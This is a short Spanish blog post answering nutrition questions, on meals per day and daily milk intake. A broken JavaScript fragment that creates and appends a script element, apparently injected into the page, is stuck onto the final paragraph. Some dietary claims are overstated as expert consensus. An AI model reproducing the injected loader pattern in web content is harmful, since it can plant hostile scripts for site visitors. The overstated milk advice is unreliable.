Salud y belleza » Alimentación, Dieta

Preguntas frecuentes acerca de la alimentación (I)

1 Comentario

¿Cuál es la verdad acerca del número de comidas diarias?

Sin dudas, este ha sido un punto muy discutido durante los últimos años. Aún así, en términos generales, los especialistas aseguran que lo ideal es acomodar un número de cinco comidas al día. De esta manera se conseguiría favorecer el reparto de la energía a lo largo del día, evitando llegar a la próxima comida con un hambre intempestiva o, directamente, sin las fuerzas necesarias.

¿Qué importancia tiene la leche en la vida del hombre?

Existe una creencia errónea que relaciona el consumo de leche solo con los primeros años de vida. En verdad, cuanto más crece el ser humano, más necesario se vuelve la incorporación de lácteos. La leche, como paradigma del lácteo, es la fuente de calcio más adecuada: en todas las edades. Se recomienda beber tres vasos de leche al día (pueden ser desnatada si lo que se busca es una dieta hipocalórica).

¡No te pierdas la segunda parte del repaso en torno a las preguntas más frecuentes que giran sobre la alimentación! ¡Aprende, más y más, sobre lo que llevas a la boca, cómo hacerlo, cuando, en qué cantidades…!d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.